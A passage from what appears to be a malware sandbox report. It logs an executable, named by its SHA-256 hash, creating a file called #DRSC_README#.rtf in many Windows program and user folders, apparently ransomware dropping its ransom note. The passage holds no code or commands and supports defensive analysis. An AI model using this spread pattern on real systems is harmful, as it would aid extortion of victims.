DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{12578975-C765-4BDF-8DDC-3284BC0E855F}v14.21.27702\packages\vcRuntimeAdditional_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\EnvironmentsApp_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Mozilla Firefox\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Oracle\Java\installcache_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\logs\setup\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\mk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\tt\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\pl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\iq5q997v.default-release\startupCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ha-Latn-NG\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\ProgramData\Package Cache\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}v14.21.27702\packages\vcRuntimeMinimum_amd64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\db\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\gd\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\e64br7r6.Admin\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\nn-NO\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-tw\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\ConnectedDevicesPlatform\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\he-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\All Users\Microsoft\User Account Pictures\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Windows.PrintDialog_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pt-br\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Oracle\Java\jre1.8.0_66_x64\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files 